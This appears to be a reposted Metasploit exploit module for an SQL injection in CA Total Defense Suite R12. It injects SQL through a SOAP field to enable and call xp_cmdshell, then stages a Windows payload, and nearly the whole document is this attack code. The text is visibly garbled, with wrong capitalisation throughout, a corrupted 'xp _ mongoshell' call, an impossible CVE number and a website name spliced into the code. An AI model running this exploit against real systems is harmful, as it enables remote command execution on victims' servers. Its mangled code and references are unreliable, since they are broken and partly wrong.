CA Total Defense Suite reGenerateReports Stored Procedure SQL Injection defects and repair

 

##

# $ Id: ca_totaldefense_regeneratereports.rb 13810 2011-10-02 17: 03: 23Z swtornio $

##

 

##

# This file is part of the Metasploit Framework and may be subject

# Redistribution and specified cial restrictions. Please see the Metasploit

# Framework web site for more information on licensing and terms of use.

##

 

Require 'msf/core'

 

Class Metasploit3 <Msf: Exploit: Remote

Rank = GreatRanking

 

Include Msf: Exploit: Export stagertftp

Include Msf: Exploit: Remote: HttpClient

 

Def initialize (info = {})

Super (update_info (info,

'Name' => 'Ca Total Defense Suite reGenerateReports Stored Procedure SQL Injection ',

'Description' => % q {

This module exploits an SQL injection flaw in CA Total Defense Suite R12.

When supplying a specially crafted soap request to '/UNCWS/Management. asmx',

Attacker can abuse the reGenerateReports stored procedure by injecting arbitrary SQL

Statements into the ReportIDs element.

 

NOTE: This module was tested against the ms SQL Server 2005 Express that's bundled

CA Total Defense Suite R12. CA's Total Defense Suite real-time protection

Will quarantine the default framework executable payload. Choosing an alternate

Exe template will bypass the quarantine.

},

'Author' => ['mc '],

'License '=> MSF_LICENSE,

'Version' => '$ Revision: 13810 $ ',

'References '=>

[

['Url', 'HTTP: // www.zerodayinitiative.com/advisories/ZDI-11-134'],

['Ossvdb', '123'],

['Cve', '2017-2011 '],

],

'Targets' =>

[

['Windows unival ',

{

'Arch '=> ARCH_X86,

'Platform' => 'win'

}

]

],

'Privileged' => true,

'Platform' => 'win ',

'Disclosuredate' => 'apr 13 2011 ',

'Defaulttarget' => 0 ))

 

Register_options (www.2cto.com

[

Opt: RPORT (34443 ),

OptBool. new ('ssl ', [true, 'use SSL', true]),

OptString. new ('cmd', [false, 'execute this command instead of using command stager ', ""])

], Self. class)

End

 

Def windows_stager

 

Exe_fname = rand_text_alphanumeric (4 + rand (4) + ". exe"

Print_status ("Sending request to # {datastore ['rhost'] }:# {datastore ['rport']}")

Execute_cmdstager ({: temp => '.'})

@ Payload_exe = payload_exe

Print_status ("Attempting to execute the payload ...")

Execute_command (@ payload_exe)

End

 

Def execute_command (cmd, opts = {})

 

Inject = [

"'') Exec master. dbo. sp_configure 'show advanced options', 1; reconfigure ;--",

"'') Exec master. dbo. sp_configure 'xp _ mongoshell', 1; reconfigure ;--",

"'') Exec master. dbo. xp_cmdshell 'cmd.exe/c # {cmd }';--",

]

Inject. each do | sqli |

 

Soap = % Q | <? Xml version = "1.0" encoding = "UTF-8"?>

<Soap12: Envelope xmlns: xsi = "http://www.w3.org/2001/XMLSchema-instance" xmlns: xsd = "http://www.w3.org/2001/XMLSchema" xmlns: soap12 = "http://www.w3.org/2003/05/soap-envelope">

<Soap12: Body>

<ReGenerateReports xmlns = "http://tempuri.org/">

<EnterpriseID> msf </EnterpriseID>

<ReportIDs >#{ sqli} </ReportIDs>

<UserID> 187 </UserID>

</ReGenerateReports>

</Soap12: Body>

</Soap12: Envelope>

|

 

Res = send_request_cgi (

{

'Url' => '/UNCWS/Management. asmx ',

'Method' => 'post ',

'Version' => '1. 0 ',

'Ctype '=> 'application/soap + xml; charset = UTF-8 ',

'Data' => soap,

}, 5)

If (res and res. body = ~ /SUCCESS /)

# Print_good ("Executing command ...")

Else

Raise RuntimeError, 'something went wrong .'

End

End

 

End

 

Def exploit

 

If not datastore ['cmd']. empty?

Print_status ("Executing command '# {datastore ['cmd']}'")

Execute_command (datastore ['cmd'])

Return

End

 

Case target ['platform']

When 'win'

Windows_stager

Else

Raise RuntimeError, 'target not supported .'

End

 

Handler

 

End

End

_ END __

POST/UNCWS/Management. asmx HTTP/1.1

Host: www.2cto.com

Content-Type: application/soap + xml; charset = UTF-8

Content-Length: length

 

<? Xml version = "1.0" encoding = "UTF-8"?>

<Soap12: Envelope xmlns: xsi = "http://www.w3.org/2001/XMLSchema-instance" xmlns: xsd = "http://www.w3.org/2001/XMLSchema" xmlns: soap12 = "http://www.w3.org/2003/05/soap-envelope">

<Soap12: Body>

<ReGenerateReports xmlns = "http://tempuri.org/">

<EnterpriseID> string </EnterpriseID>

<ReportIDs> string </ReportIDs> <-- boom !!

<UserID> long </UserID>

</ReGenerateReports>

</Soap12: Body>

</Soap12: Envelope>